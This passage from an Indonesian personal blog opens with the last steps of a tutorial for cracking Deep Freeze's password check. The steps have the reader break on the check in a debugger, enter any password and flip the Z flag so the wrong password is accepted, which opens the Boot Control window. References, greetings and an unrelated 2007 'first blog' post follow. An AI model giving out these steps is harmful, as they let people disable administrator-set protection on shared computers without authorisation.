7. Setelah kita buat Stopper, maka selanjutnya kita harus menjalankan file out.exe ini, tekan F9 dan program out.exe akan jalan, bila benar
maka akan ada ikon DeepFreeze yang baru (setelah sebelumnya tidak ada karena Process Frzstate.exe kita matikan)...
8. Jalankan Logon Window dari out.exe ini dengan memilih ikonnya di system tray(SHIFT+dobel klik) atau tekan CTRL+SHIFT+ALT+F6, maka kita akan
menuju ke window prompt password DeepFreeze :), masukkan password apa saja di kolom Enter Password dan klik OK.
9. Selanjutnya program out.exe akan terhenti karena stopper yang kita buat sebelumnya, lihat kolom registers FPU (sebelah kanan window kode-kode)
lalu lihat bagian Flag Z, disana termuat nilai 1 (artinya Password yang kita masukkan salah, hal ini berbeda dengan DeepFreeze Versi 4 atau 5)..
ganti nilai Flag Z tersebut dengan dobel klik di Flag Z tsb (nilai akan berubah menjadi 0, artinya password kita dianggap Valid :D)...Lalu tekan F9
lagi dan ............ VIOLA window Boot Control dari Deep Freeze muncul dengan status2nya :D hehehehehehehehhe

referensi :
1.http://usuarios.arnet.com.ar/fliamarconato/
2.http://webs.uolsinectis.com.ar/c_delgado/
3.http://google.co.id/

Greetings :
- Emiliano Scavuzzo (anshoku@yahoo.com) //Thanks 4 Ur tutor(s) n Software(s)
- MyzTx @ MyzTx Soft. House // Thanks 4 Ur support Dude!! :P

Duh pertama kali nih :D

2007-06-28T22:42:00.000+07:00

Owwww Yeaahhhh!!! Blog pertamaQuwwww.....

Gk da yang special di sini... tapi aq harap yang baca betah n mau ngasi saran-kritik buat blog ini :D

Thx,